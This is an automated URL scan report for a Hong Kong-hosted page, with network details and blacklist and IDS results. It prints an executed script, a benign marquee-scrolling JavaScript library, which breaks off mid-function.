Overview

URL www.hzminda.com/read/432089.html
IP122.9.202.181
ASNAS38197 Sun Network (Hong Kong) Limited
Location Hong Kong
Report completed2017-07-17 14:16:26 CEST
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2017-07-17 2 js.users.51.la/19149991.js Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

No other reports on IP: 122.9.202.181


Last 10 reports on ASN: AS38197 Sun Network (Hong Kong) Limited

Date UQ / IDS / BL URL IP
2017-11-23 01:47:58 +0100
0 - 0 - 1 www.3330740.com/ 103.40.112.163
2017-11-22 23:46:18 +0100
0 - 0 - 5 ixczgvh.cn/ 122.9.64.217
2017-11-22 23:44:07 +0100
0 - 3 - 0 junqiango.pw/ 210.56.57.196
2017-11-22 23:39:06 +0100
0 - 2 - 0 pvckalc.top/ 103.44.23.11
2017-11-22 23:31:45 +0100
0 - 0 - 1 cctu0.cn/ 210.56.54.131
2017-11-22 23:30:47 +0100
0 - 0 - 1 cypsc.cn/ 107.151.67.88
2017-11-22 23:13:35 +0100
0 - 3 - 1 mlnzhg.com/about.html 103.12.68.66
2017-11-22 23:13:27 +0100
0 - 0 - 1 mxmining.com/xueyuanfengcai/wenxueyuchuanmeix (...) 103.229.182.119
2017-11-22 23:11:47 +0100
0 - 0 - 1 uqi6lkn.uvuxc.cn/lfsno/ 123.60.255.212
2017-11-22 23:11:46 +0100
0 - 0 - 1 uqi6lkn.uvuxc.cn/oyuhezr.html 123.60.255.212

No other reports on domain: .



JavaScript

Executed Scripts (16)


Executed Evals (2)

#1 JavaScript::Eval (size: 19483, repeated: 1) - SHA256: cf24e7b88e3cc0346b46e3091f85acafafaa724a97c8abf179118c2278c39bc9

                                        function Marquee() {
    var c = this,
        b = arguments,
        a;
    if (!(c instanceof b.callee)) {
        return (typeof b[0] == "object" && b[0].length && b.length < 5) || (typeof b[0] != "object" && b.length < 5) ? alert("Set mode does not accept!") : new Marquee(b[0], b[1], b[2], b[3], b[4], b[5], b[6], b[7], b[8], b[9], b[10], b[11], b[12])
    }
    c.$ = function(d) {
        return document.getElementById(d)
    };
    c.t = (c.F = ["MSClass 2.9.120108", "Class Of Marquee Scroll", "General Uninterrupted Scrolling(JS)", "http://www.popub.net/script/MSClass.html", "Yongxiang Cui(333) zhadan007@21cn.com"]).join("\n");
    if (!((c.c = typeof(c.a = b[0]["MSClass"] || b[0] || b[0][0]) == "object" ? c.$(c.a[0]) || c.$(c.a.MSClassID) : c.$(c.a)) && c.constructor.toString().substr(73737 >> 333, 123 >>> 4) == c.F[1].substr(79 >>> 99, 14 >> 97))) {
        return alert("The [" + (c.a.MSClassID || c.a[0] || c.a) + "] initialization error!") || (c.c = -1)
    }
    if (c.c.nodeName == "UL" || c.c.nodeName == "OL" || c.c.nodeName == "DL") {
        c.a = [0, c.c.id];
        c.c = c.c.parentNode
    }
    c.Direction = b[1] || b[0]["Direction"] || 0;
    c.Step = b[2] || b[0]["Step"] || 1;
    c.Width = c.W = (a = b[3] || b[0]["Width"] || 0) == 0 ? parseInt(c.c.style.width) : a;
    c.Height = c.H = (a = b[4] || b[0]["Height"] || 0) == 0 ? parseInt(c.c.style.height) : a;
    c.Timer = (a = b[5] || b[0]["Timer"] || 0) < 20 ? (a * 10 || 20) : a;
    c.DelayTime = (a = b[6] || b[0]["DelayTime"] || 0) <= 120 ? a * 1000 : a;
    c.WaitTime = (a = b[7] || b[0]["WaitTime"] || 0) <= 120 ? (a * 1000 || 800) : a;
    c.ScrollStep = b[8] || b[0]["ScrollStep"] || 0;
    c.SwitchType = b[9] || b[0]["SwitchType"] || 0;
    c.HiddenID = b[10] || b[0]["HiddenID"];
    c.PrevBtn = c.$(b[11] || b[0]["PrevBtnID"]) || 0;
    c.NextBtn = c.$(b[12] || b[0]["NextBtnID"]) || 0;
    c.c.style.overflow = c.c.style.overflowX = c.c.style.overflowY = "hidden";
    if (b.length >= 5 || b[0]["AutoStart"]) {
        c.Start()
    }
}
Marquee.prototype.Start = function() {
    if (this.c == -1 || this.i >= 0) {
        if (this.i == 2) {
            this.Continue()
        }
        return false
    }
    var k = this,
        M = k.c,
        b, w, Z, aa, ai, ae, z, n, T = 0,
        g = "active",
        ah = Marquee,
        R = 0,
        s = [],
        h = 0,
        O = 0,
        d = 0,
        r = {
            rollbackleft: -2,
            altertop: -1,
            alterup: -1,
            top: 0,
            up: 0,
            bottom: 1,
            down: 1,
            left: 2,
            right: 3,
            alterleft: 4,
            rollbacktop: 5
        },
        S = [],
        an = 0,
        V = 0,
        v = 0,
        ab = 0,
        I = 0,
        B = 0,
        a = 0,
        F = 0,
        X = 0,
        l = 0,
        J = 0,
        ao = 0,
        D = 0,
        x = 0,
        u = 0,
        W = 0,
        af = 0,
        c = [],
        al = null,
        am = null,
        t = 0,
        o = 0,
        Y = k.ScrollStep,
        P = k.DelayTime,
        C = 0,
        U = 0,
        A = [],
        ag = 0,
        N = 0,
        Q = 0;
    k.I = k.j = 1 + (k.i = k.Bound = -1);
    if (!ah.H) {
        window.$ ? 0 : window.$ = k.$;
        ah.m = (document.all) ? 1 : 0;
        ah.IsFF = navigator.userAgent.indexOf("Firefox") > 0;
        ah.H = function(m, j, i) {
            i ? 0 : i = 0;
            return ah.m ? (m.currentStyle[j] != "auto" && m.currentStyle[j] != "medium" && m.currentStyle[j] != "0px" && m.currentStyle[j] != "30pt" && m.currentStyle[j] != "1em" && m.currentStyle[j] != "static") ? m.currentStyle[j] : i : (window.getComputedStyle(m, null)[j] != "auto" && window.getComputedStyle(m, null)[j] != "medium" && window.getComputedStyle(m, null)[j] != "0px" && window.getComputedStyle(m, null)[j] != "12px" && window.getComputedStyle(m, null)[j] != "static") ? window.getComputedStyle(m, null)[j] : i
        };
        (ah.K = function(m, j, i) {
            ah.m ? m.attachEvent("on" + j, i) : m.addEventListener(j, i, false)
        })(top.document, "keydown", function(i) {
            if ((i || window.event).keyCode == 113) {
                alert(k.t)
            }
        });
        ah.L = function(m, j, i) {
            ah.m ? m.detachEvent("on" + j, i) : m.removeEventListener(j, i, false)
        };
        ah.Tween = {
            def: function(i, m, j) {
                return m
            },
            inquad: function(i, m, j) {
                return m * (i /= j) * i
            },
            outquad: function(i, m, j) {
                return -m * (i /= j) * (i - 2)
            },
            inoutquad: function(i, m, j) {
                return (i /= j / 2) < 1 ? m / 2 * i * i : -m / 2 * ((--i) * (i - 2) - 1)
            },
            incubic: function(i, m, j) {
                return m * (i /= j) * i * i
            },
            outcubic: function(i, m, j) {
                return m * ((i = i / j - 1) * i * i + 1)
            },
            inoutcubic: function(i, m, j) {
                return (i /= j / 2) < 1 ? m / 2 * i * i * i : m / 2 * ((i -= 2) * i * i + 2)
            },
            inquart: function(i, m, j) {
                return m * (i /= j) * i * i * i
            },
            outquart: function(i, m, j) {
                return -m * ((i = i / j - 1) * i * i * i - 1)
            },
            inoutquart: function(i, m, j) {
                return (i /= j / 2) < 1 ? m / 2 * i * i * i * i : -m / 2 * ((i -= 2) * i * i * i - 2)
            },
            inquint: function(i, m, j) {
                return m * (i /= j) * i * i * i * i
            },
            outquint: function(i, m, j) {
                return m * ((i = i / j - 1) * i * i * i * i + 1)
            },
            inoutquint: function(i, m, j) {
                return (i /= j / 2) < 1 ? m / 2 * i * i * i * i * i : m / 2 * ((i -= 2) * i * i * i * i + 2)
            },
            insine: function(i, m, j) {
                return -m * Math.cos(i / j * (Math.PI / 2)) + m
            },
            outsine: function(i, m, j) {
                return m * Math.sin(i / j * (Math.PI / 2))
            },
            inoutsine: function(i, m, j) {
                return -m / 2 * (Math.cos(Math.PI * i / j) - 1)
            },
            inexpo: function(i, m, j) {
                return i == 0 ? 0 : m * Math.pow(2, 10 * (i / j - 1))
            },
            outexpo: function(i, m, j) {
                return i == j ? m : m * (-Math.pow(2, -10 * i / j) + 1)
            },
            inoutexpo: function(i, m, j) {
                return i == 0 ? 0 : i == j ? m : (i /= j / 2) < 1 ? m / 2 * Math.pow(2, 10 * (i - 1)) : m / 2 * (-Math.pow(2, -10 * --i) + 2)
            },
            incirc: function(i, m, j) {
                return -m * (Math.sqrt(1 - (i /= j) * i) - 1)
            },
            outcirc: function(i, m, j) {
                return m * Math.sqrt(1 - (i = i / j - 1) * i)
            },
            inoutcirc: function(i, m, j) {
                return (i /= j / 2) < 1 ? -m / 2 * (Math.sqrt(1 - i * i) - 1) : m / 2 * (Math.sqrt(1 - (i -= 2) * i) + 1)
            },
            inelastic: function(j, ar, aq) {
                var m = 1.70158,
                    ap = 0,
                    i = ar;
                if (j == 0) {
                    return 0
                }
                if ((j /= aq) == 1) {
                    return ar
                }
                if (!ap) {
                    ap = aq * 0.3
                }
                if (i < Math.abs(ar)) {
                    i = ar;
                    m = ap / 4
                } else {
                    m = ap / (2 * Math.PI) * Math.asin(ar / i)
                }
                return -(i * Math.pow(2, 10 * (j -= 1)) * Math.sin((j * aq - m) * (2 * Math.PI) / ap))
            },
            outelastic: function(j, ar, aq) {
                var m = 1.70158,
                    ap = 0,
                    i = ar;
                if (j == 0) {
                    return 0
                }
                if ((j /= aq) == 1) {
                    return ar
                }
                if (!ap) {
                    ap = aq * 0.3
                }
                if (i < Math.abs(ar)) {
                    i = ar;
                    m = ap / 4
                } else {
                    m = ap / (2 * Math.PI) * Math.asin(ar / i)
                }
                return i * Math.pow(2, -10 * j) * Math.sin((j * aq - m) * (2 * Math.PI) / ap) + ar
            },
            inoutelastic: function(j, ar, aq) {
                var m = 1.70158,
                    ap = 0,
                    i = ar;
                if (j == 0) {
                    return 0
                }
                if ((j /= aq / 2) == 2) {
                    return ar
                }
                if (!ap) {
                    ap = aq * (0.3 * 1.5)
                }
                if (i < Math.abs(ar)) {
                    i = ar;
                    m = ap / 4
                } else {
                    m = ap / (2 * Math.PI) * Math.asin(ar / i)
                }
                if (j < 1) {
                    return -0.5 * (i * Math.pow(2, 10 * (j -= 1)) * Math.sin((j * aq - m) * (2 * Math.PI) / ap))
                }
                return i * Math.pow(2, -10 * (j -= 1)) * Math.sin((j * aq - m) * (2 * Math.PI) / ap) * 0.5 + ar
            },
            inback: function(i, ap, m) {
                var j = 1.70158;
                return ap * (i /= m) * i * ((j + 1) * i - j)
            },
            outback: function(i, ap, m) {
                var j = 1.70158;
                return ap * ((i = i / m - 1) * i * ((j + 1) * i + j) + 1)
            },
            inoutback: function(i, ap, m) {
                var j = 1.70158;
                return (i /= m / 2) < 1 ? ap / 2 * (i * i * (((j *= 1.525) + 1) * i - j)) : ap / 2 * ((i -= 2) * i * (((j *= 1.525) + 1) * i + j) + 2)
            },
            inbounce: function(i, m, j) {
                return m - ah.Tween.outbounce(j - i, m, j)
            },
            outbounce: function(i, m, j) {
                return (i /= j) < 1 / 2.75 ? m * 7.5625 * i * i : i < 2 / 2.75 ? m * (7.5625 * (i -= 1.5 / 2.75) * i + 0.75) : i < 2.5 / 2.75 ? m * (7.5625 * (i -= 2.25 / 2.75) * i + 0.9375) : m * (7.5625 * (i -= 2.625 / 2.75) * i + 0.984375)
            },
            inoutbounce: function(i, m, j) {
                return i < j / 2 ? ah.Tween.inbounce(i * 2, m, j) * 0.5 : ah.Tween.outbounce(i * 2 - j, m, j) * 0.5 + m * 0.5
            },
            simple: function(i, m, j) {
                return i * m / j
            }
        }
    }
    if (typeof k.W == "string" || typeof k.Width == "string") {
        k.Width = M.parentNode.scrollWidth * (parseInt(k.W) || parseInt(k.Width)) / 100
    }
    if (typeof k.H == "string" || typeof k.Height == "string") {
        k.Height = M.parentNode.scrollHeight * (parseInt(k.H) || parseInt(k.Height)) / 100
    }
    if (!isNaN(k.Width)) {
        M.style.width = k.Width + "px"
    }
    if (!isNaN(k.Height)) {
        M.style.height = k.Height + "px"
    }
    if (typeof k.Direction == "string") {
        k.Direction = r[k.Direction.toString().toLowerCase()]
    }
    Q = k.Direction > 1 ? 1 : 0;
    b = Q ? "<table cellspacing='0' cellpadding='0' style='border-collapse:collapse;display:inline;'><tr><td noWrap=true style='white-space: nowrap;word-break:keep-all;'>MSCLASS_TEMP_HTML</td><td noWrap=true style='white-space: nowrap;word-break:keep-all;'>MSCLASS_TEMP_HTML</td></tr></table>" : "<table cellspacing='0' cellpadding='0' style='border-collapse:collapse;'><tr><td>MSCLASS_TEMP_HTML</td></tr><tr><td>MSCLASS_TEMP_HTML</td></tr></table>";
    w = Q ? k.Width : k.Height;
    ai = Q ? "scrollWidth" : "scrollHeight";
    aa = Q ? "scrollLeft" : "scrollTop";
    Z = Q ? "left" : "top";
    k.n = M.innerHTML;
    if (k.Step.length) {
        T = (function(i) {
            k.Step = k.Step[0] < 1 ? parseFloat(k.Step[0].toString().replace("0.", "")) : parseFloat(k.Step[0]);
            for (ak in ah.Tween) {
                var j = ++j || 0;
                if ((ak.substr(4) == i || i.substr(4) == ak || ak == i || i == j) && j >= 0) {
                    R = j;
                    return ak
                }
            }
        })(k.Step[1].toString().toLowerCase()).toString()
    }
    if (k.Step < 1) {
        T = k.Step
    }
    if (k.Step >= w) {
        k.SwitchType = 5
    }
    switch (k.SwitchType) {
        case 0:
            k.ScrollStep = k.ScrollStep || w;
            break;
        case 1:
            Y = k.ScrollStep = w;
            ag = o = 1;
            break;
        case 3:
            k.I = af = 1;
            break;
        case 4:
            Y = Y || 1;
            C = 1;
            break;
        case 5:
            T = "def";
            k.Step = k.ScrollStep = k.ScrollStep || w;
            break;
        default:
            k.SwitchType == 2 ? h = 1 : F = ah.m ? k.SwitchType : 1 - (h = 1);
            if (Y > 0) {
                ag = N = 1 - (h = 0);
                k.ScrollStep = w
            }
            if (ah.m && F > 0) {
                M.style.filter = "revealTrans(Duration=" + (P / 1000 * 0.2) + ",Transition=" + (F - 10) + ")";
                if (F >= 33 || F < 10) {
                    M.filters.revealTrans.Transition = Math.round(Math.random() * 22)
                }
                M.filters.revealTrans.apply();
                M.filters.revealTrans.play()
            }
            k.Step = w;
            R = T = 1 - (o = 1)
    }
    if (k.HiddenID) {
        var ad = (typeof k.HiddenID) == "string" ? [k.HiddenID] : k.HiddenID;
        for (ak = 0; ak < ad.length; ak++) {
            var H = k.$(ad[ak]);
            if (H && H.style.display == "none") {
                V = 1;
                s[ak] = [H, ah.H(H, "position", "static"), ah.H(H, "top")];
                H.style.position = "absolute";
                H.style.visibility = "hidden";
                H.style.top = "-10000px";
                H.style.display = "block"
            }
        }
    }(k.G = function(aB) {
        if (typeof k.a == "object" && (!k.a.length || k.a.length > 0)) {
            am = k.$(k.a[1]) || k.$(k.a.ContentID);
            if (am) {
                if (am.tagName == "UL" || am.tagName == "OL") {
                    am.style.fontSize = am.style.border = am.style.padding = "0";
                    ah.H(am, "lineHeight") == "normal" ? am.style.lineHeight = "1.15" : 0;
                    if (Q && ah.m) {
                        am.style.width = "100000px"
                    }
                }
                am.style.display = "inline-block";
                t = am.style.margin = am.style.padding = 0;
                am.style.listStyle = "none";
                for (var aw = 0, av = am.childNodes.length; aw < av; aw++) {
                    var aF = am.childNodes[aw];
                    if (aF.nodeType == 1) {
                        aF.style.listStyle = "none";
                        if (Q) {
                            var au = parseInt(aF.style.marginLeft = ah.H(aF, "marginLeft")),
                                m = parseInt(aF.style.marginRight = ah.H(aF, "marginRight")),
                                aq = parseInt(aF.style.borderLeftWidth = ah.H(aF, "borderLeftWidth")),
                                aD = parseInt(aF.style.borderRightWidth = ah.H(aF, "borderRightWidth"));
                            if (ah.H(aF, "display") != "table-cell") {
                                aF.style.styleFloat = aF.style.cssFloat = "left";
                                aF.style.display = "inline";
                                t += (A[A.length] = aF[ai] + au + m + aq + aD)
                            } else {
                                ah.IsFF ? t += (A[A.length] = aF[ai]) : t += (A[A.length] = aF[ai] + aq + aD)
                            }
                        } else {
                            aF.style.display = "block";
                            aF.style.clear = "both";
                            A[A.length] = aF[ai]
                        }
                        if (af) {
                            c[c.length] = aF
                        }
                    }
                }
                U = A.length;
                k.Direction <= 1 ? t = am[ai] : 0;
                Q ? (am.style.width = t + "px") || (am.style.height = k.Height + "px") : (am.style.height = t + "px") || (am.style.width = k.Width + "px");
                I = parseInt(M[ai] / (k.ScrollStep || w));
                ab = k.Counter = 1;
                if (typeof k.a == "object" && (!k.a.length || k.a.length > 1)) {
                    var ay = k.$(k.a[2]) || k.a[2] || k.$(k.a.TabID);
                    if (ay && (ay.length || ay.tagName)) {
                        var ax = (k.a[3] || k.a.TabEvent || "onmouseover").toString().toLowerCase();
                        (ax == "onmouseover" || ax == "onclick") ? 0: ax = "onmouseover";
                        var ar = (k.a[4] || k.a.TabTimeout || 0);
                        k.ScrollStep = k.ScrollStep || w;
                        var aC = Math.ceil(t / k.ScrollStep);
                        var ap = aC * k.ScrollStep - t;
                        if (ap > 0) {
                            for (var aw = am.childNodes.length - 1; aw >= 0; aw--) {
                                var aF = am.childNodes[aw];
                                if (aF.nodeType == 1) {
                                    Q ? aF.style.marginRight = parseInt(ah.H(aF, "marginRight")) + ap + "px" : aF.style.marginBottom = parseInt(ah.H(aF, "marginBottom")) + ap + "px";
                                    t += ap;
                                    break
                                }
                            }
                        }
                        for (var az = 0, at = ay.length || 1, aA = 0, aE = ay; az < at; az++) {
                            if (at > 1) {
                                aE = k.$(ay[az])
                            }
                            aE.style.margin = aE.style.padding = 0;
                            aE.style.listStyle = "none";
                            if (aE.tagName == "UL") {
                                aE.style.fontSize = "0"
                            }
                            I = aE.childNodes.length;
                            for (var aw = 0; aw < I; aw++) {
                                if (aE.childNodes[aw].nodeType == 1) {
                                    if (aC == aA || aC <= 1) {
                                        aE.childNodes[aw].style.display = "none";
                                        continue
                                    }
                                    aE.childNodes[aw].style.fontSize = ah.H(aE.childNodes[aw], "fontSize", "12px");
                                    aE.childNodes[aw].style.overflow = "hidden";
                                    S[aA] = aE.childNodes[aw];
                                    S[aA][ax] = (function(i) {
                                        return function() {
                                            W = setTimeout(function() {
                                                v = 1;
                                                for (var aG = 0; aG < S.length; aG++) {
                                                    S[aG].className = ""
                                                }
                                                S[i].className = g;
                                                f(i)
                                            }, ar)
                                        }
                                    })(aA);
                                    S[aA].onmouseout = (function(i) {
                                        return function() {
                                            clearTimeout(W);
                                            if (v) {
                                                v = 0;
                                                if (k.i == 0) {
                                                    clearInterval(x);
                                                    x = setInterval(D, k.Timer)
                                                } else {
                                                    clearTimeout(u);
                                                    u = setTimeout(p, P)
                                                }
                                                E(i)
                                            }
                                        }
                                    })(aA);
                                    aA += 1
                                }
                            }
                        }
                        I = aA;
                        a = I > 1 ? 1 : 0;
                        if (S.length > 0) {
                            S[0].className = g
                        }
                        if (I > 0 && aC > I) {
                            B = aC - I;
                            for (var av = 0; av < S.length; av++) {
                                S[av].onmouseover = S[av].onmouseout = function() {}
                            }
                            I = aC;
                            alert("The [" + M.id + "] pages or tab numbers less [" + B + "] than actual pages!") || 0
                        }
                    }
                }
                Q ? am.style.height = k.Height + "px" : am.style.width = k.Width + "px";
                if (!af && (o == 0 || o == 2) && !h && F == 0 && k.Direction >= 0 && k.Direction <= 3) {
                    Q ? am.style.width = t * 2 + "px" : am.style.height = t * 2 + "px";
                    am.innerHTML += am.innerHTML
                } else {
                    Q ? am.style.width = t + "px" : am.style.height = t + "px"
                }
            }
        }
    })();
    if (!ab && af) {
        for (var ak = 0, aj = M.childNodes.length; ak < aj; ak++) {
            if (M.childNodes[ak].nodeType == 1) {
                c[c.length] = M.childNodes[ak]
            }
        }
    }
    if (!ab && !af && (k.Direction == 0 || k.Direction == 1)) {
        M.innerHTML = b.replace(/MSCLASS_TEMP_HTML/g, M.innerHTML)
    } else {
        if (!ab && !af && (k.Direction == 2 || k.Direction == 3)) {
            M.noWrap = true;
            M.style.whiteSpace = "nowrap";
            (k.ScrollStep == 0 && P == 0) ? M.innerHTML += M.innerHTML: M.innerHTML = b.replace(/MSCLASS_TEMP_HTML/g, M.innerHTML)
        } else {
            if (k.Direction >= 4 || k.Direction <= -1) {
                if (k.Direction == 5 || k.Direction == -2) {
                    X = 1
                }
                k.Direction = 22 % k.Direction;
                k.I = 1
            }
        }
    }
    an = k.I;
    ae = k.ScrollStep;
    z = k.Direction;
    ab ? M.style.position = ah.H(M, "position", "relative") : 0;
    if (ag) {
        n = document.createElement("div");
        n.style.width = k.Width + "px";
        n.style.height = k.Height + "px";
        n.style.position = "absolute";
        n.style[Z] = k.Direction % 2 ? -w + "px" : w + "px";
        Q ? n.style.top = "0" : n.style.left = "0";
        n.innerHTML = M.innerHTML;
        n.style.overflow = n.style.overflowX = n.style.overflowY = "hidden";
        M.appendChild(n)
    }
    var L = (typeof T == "string" && o == 0) ? 2 : o,
        D = function() {
            T > 0 ? k.Step = Math.ceil((k.ScrollStep - d) * T) : 0;
            y[L]()
        },
        E = function(j) {
            if (k.i == 2) {
                return false
            }
            if (X) {
                z = z > 1 ? 2 : 0
            }
        },
        f = function(j) {
            if (k.i == 2 || (o == 1 && j + 1 == k.Counter)) {
                return false
            }
            k.Pause();
            if (o == 0) {
                var m = parseInt(M[aa] / ae) + 1;
                if (j + 1 == m && M[aa] % ae == 0) {
                    return false
                }
                if (m > I) {
                    m -= I
                }
                j += 1;
                v = 1;
                if (j <= m) {
                    k.ScrollStep = ae * (m - j) + M[aa] % ae;
                    k.Direction = Q ? 3 : 1
                } else {
                    if (j - m == I - 1) {
                        if (R == 24) {
                            T = "inelastic"
                        }
                        if (R == 27 || R == 26) {
                            T = "inback"
                        }
                    }
                    if (m <= 2 && j == I && R == 23) {
                        T = "inelastic"
                    }
                    k.ScrollStep = ae * (j - m) - M[aa] % ae;
                    k.Direction = Q ? 2 : 0
                }
                k.Counter = j
            } else {
                if (o == 1) {
                    if (k.i == 0 && an) {
                        k.Direction = Q ? 5 - k.Direction : 1 - k.Direction;
                        z = k.Direction
                    }
                    if (ag && !N) {
                        k.Direction % 2 ? n.style[Z] = -w + M[aa] + "px" : n.style[Z] = w + M[aa] + "px";
                        j == I ? n[aa] = 1 - (k.Counter = 1) : n[aa] = w * j
                    }
                    k.Counter = j + 1
                }
            }
            if (k.ScrollStep > 0) {
                p(0, j)
            }
        },
        ac = function(m) {
            clearTimeout(O);
            var ap = m || M,
                i = N ? 100 : 5,
                j = N ? -5 : 5;
            (function() {
                ah.m ? ap.style.filter = "alpha(opacity=" + i + ")" : ap.style.opacity = i / 100;
                i += j;
                (j < 0 ? i >= 0 : i <= 100) ? O = setTimeout(arguments.callee, k.Timer): j < 0 ? ap.style.visibility = "hidden" : 0
            })()
        },
        p = function(m, j) {
            var ap = k.Direction % 2;
            if (h) {
                ac()
            }
            if (N) {
                var aq = j >= 0 ? j : k.Counter;
                n[aa] = M[aa];
                n.style[Z] = aq == I ? 0 : w * aq + "px";
                n.style.visibility = "visible";
                ac(n)
            }
            if (F > 0) {
                if (F >= 33 || F < 10) {
                    M.filters.revealTrans.Transition = Math.round(Math.random() * 22)
                }
                M.filters.revealTrans.apply();
                M.filters.revealTrans.play()
            }
            if (k.j) {
                u = setTimeout(p, P)
            } else {
                clearInterval(x);
                l = J = d = k.i = 0;
                if (an && T > 0) {
                    if ((k.Direction == 2 || k.Direction == 0) && M[ai] - w - M[aa] < k.ScrollStep) {
                        k.ScrollStep = M[ai] - w - M[aa]
                    }
                    if (ap && M[aa] < k.ScrollStep) {
                        k.ScrollStep = M[aa]
                    }
                }
                if (ab && !v) {
                    ap ? k.Counter -= 1 : k.Counter += 1;
                    if (an && o == 1 && k.Counter > I) {
                        k.Counter = 1
                    }
                    if (k.Counter > I) {
                        an ? k.Counter -= 1 : k.Counter -= I
                    }
                    if (k.Counter <= 0) {
                        an ? k.Counter = 1 : k.Counter = I
                    }
                    ap && X ? k.Counter = 1 : 0;
                    if (a && B == 0) {
                        for (var j = 0; j < I; j++) {
                            S[j].className = ""
                        }
                        S[k.Counter - 1].className = g
                    }
                }
                if (an && (af || I > 1)) {
                    if ((R == 22 || R == 24) && ((!ap && k.Counter == 2) || (ap && k.Counter == I - 1))) {
                        T = "outelastic"
                    }
                    if ((R == 23 || R == 24) && (af || (!ap && k.Counter == I) || (ap && k.Counter == 1))) {
                        T = "inelastic"
                    }
                    if ((R == 25 || R == 27) && ((!ap && k.Counter == 2) || (ap && k.Counter == I - 1))) {
                        T = "outback"
                    }
                    if ((R == 26 || R == 27) && (af || (!ap && k.Counter == I) || (ap && k.Counter == 1))) {
                        T = "inback"
                    }
                }
                if (an && k.Bound >= 0) {
                    k.Bound = -1;
                    k.UnBound()
                }
                if (C) {
                    k.ScrollStep = K(ap)
                }
                x = setInterval(D, k.Timer);
                k.OnScroll()
            }
        },
        q = function() {
            clearInterval(x);
            l = J = d = 1 - (k.i = 1);
            k.ScrollStep = ae;
            k.Direction = z;
            if (v) {
                return false
            }
            if (an) {
                if (o == 1) {} else {
                    if (M[aa] == 0 || M[aa] >= M[ai] - w) {
                        if (af) {
                            G()
                        } else {
                            if (X) {
                                k.ScrollStep = z % 2 ? ae : M[aa]
                            }
                            k.Bound = k.Direction;
                            k.OnBound();
                            z = k.Direction = Q ? 5 - k.Direction : 1 - k.Direction
                        }
                    }
                }
            }
            k.OnPause();
            u = setTimeout(p, P)
        },
        K = function(aq) {
            for (var m = 0, j = 0; m < Y; m++) {
                var ap = (ap = M.getAttribute("nownum") / 1 + 1 || 1) > U ? 1 : ap;
                M.setAttribute("nownum", ap);
                if (aq) {
                    ap = U - ap + 1
                }
                j += A[ap - 1]
            }
            return j
        },
        G = function() {
            if (Y > 0) {
                if (al) {
                    ac(al)
                }
            }
            var j = !ab ? M : am,
                ap = k.Direction % 2;
            var m = ap ? c.length - 1 : 0;
            al = c[m].cloneNode(true);
            k.ScrollStep = c[m][ai];
            if (Y > 0) {
                ah.m ? al.style.filter = "alpha(opacity = 0)" : al.style.opacity = 0
            }
            ap ? j.insertBefore(al, j.childNodes[0]) : j.appendChild(al);
            j.removeChild(c[m]);
            ap ? M[aa] = k.ScrollStep : M[aa] = M[ai] - w - k.ScrollStep;
            if (ap) {
                c.unshift(al);
                c.pop()
            } else {
                c.push(al);
                c.shift()
            }
        },
        e = function() {
            k.y = (t * 2 || M[ai]) / 2;
            if (o == 0 && k.y <= w + k.Step && !an) {
                if (ab) {
                    var j = M.getAttribute("fixnum") / 1 + 1 || 1;
                    M.setAttribute("fixnum", j);
                    if (j < 5) {
                        k.G();
                        setTimeout(e, 0)
                    }
                } else {
                    M.innerHTML = k.n
                }
                return false
            }
            if (an) {
                k.Bound = Q ? 5 - k.Direction : 1 - k.Direction
            }
            if (V) {
                for (ak = 0; ak < s.length; ak++) {
                    var i = s[ak][0];
                    i.style.position = s[ak][1];
                    i.style.display = "none";
                    i.style.visibility = "visible";
                    i.style.top = s[ak][2]
                }
            }
            if (P > 0 && k.PrevBtn) {
                k.PrevBtn.onclick = function() {
                    k.Run(Q ? 5 - k.Direction : 1 - k.Direction)
                }
            }
            if (P > 0 && k.NextBtn) {
                k.NextBtn.onclick = function() {
                    k.Run(k.Direction)
                }
            }
            M[aa] = k.i = l = J = 0;
            if (af) {
                if (!k.Direction % 2) {
                    M[aa] = M[ai]
                }
                G()
            }
            if (ag) {
                n[aa] = k.ScrollStep
            }
            ao = Math.round(k.ScrollStep / k.Step);
            if (k.WaitTime >= 60000) {
                k.i = 1;
                if (k.WaitTime == 100000) {
                    P = k.DelayTime = 3600000
                }
                k.WaitTime = 3600000;
                return
            }
            setTimeout(function() {
                if ((k.ScrollStep >= 0 && k.l) || (P == 0 && k.ScrollStep == -2 && k.l)) {
                    k.l()
                }
                p()
            }, k.WaitTime - 800)
        },
        y = [function() {
            var i = k.Direction % 2;
            d += k.Step;
            if ((d >= k.ScrollStep && P > 0) || (an && d > k.Step && (M[aa] <= 0 || M[aa] >= M[ai] - w))) {
                i ? M[aa] -= k.ScrollStep + k.Step - d : M[aa] += k.ScrollStep + k.Step - d;
                q();
                return
            }
            switch (i) {
                case 0:
                    if (M[aa] >= k.y && !an) {
                        M[aa] -= k.y
                    }
                    M[aa] += k.Step;
                    break;
                case 1:
                    if (M[aa] <= k.Step && !an) {
                        M[aa] += k.y
                    }
                    M[aa] -= k.Step
            }
        }, function() {
            if (N || h) {
                q();
                return M[aa] = k.Counter == 1 ? 0 : w * (k.Counter - 1)
            }
            var i = k.Direction % 2;
            R > 0 ? d += l : d += k.Step;
            if ((R == 0 && d >= k.ScrollStep && P > 0) || (R > 0 && l > ao)) {
                i ? n.style[Z] = (parseInt(n.style[Z]) - (k.ScrollStep - k.Step - d)) + "px" : n.style[Z] = (parseInt(n.style[Z]) + (k.ScrollStep - k.Step - d)) + "px";
                q();
                M[aa] = n[aa];
                i ? n.style[Z] = -w + M[aa] + "px" : n.style[Z] = w + M[aa] + "px";
                k.Counter == I ? n[aa] = 0 : n[aa] = w * k.Counter
            } else {
                if (R > 0) {
                    J += (k.Step = Math.round(ah.Tween[T](l++, k.ScrollStep, ao)) - J)
                }
                i ? n.style[Z] = (parseInt(n.style[Z]) + k.Step) + "px" : n.style[Z] = (parseInt(n.style[Z]) - k.Step) + "px"
            }
        }, function() {
            if (l <= ao) {
                J += (k.Step = Math.round(ah.Tween[T](l++, k.ScrollStep, ao)) - J);
                if (M[aa] <= k.Step && !an) {
                    M[aa] += k.y
                }
                k.Direction % 2 ? M[aa] -= k.Step : M[aa] += k.Step
            } else {
                if (M[aa] > k.y && !an) {
                    M[aa] -= k.y
                }
                q()
            }
        }];
    k.Run = function(j) {
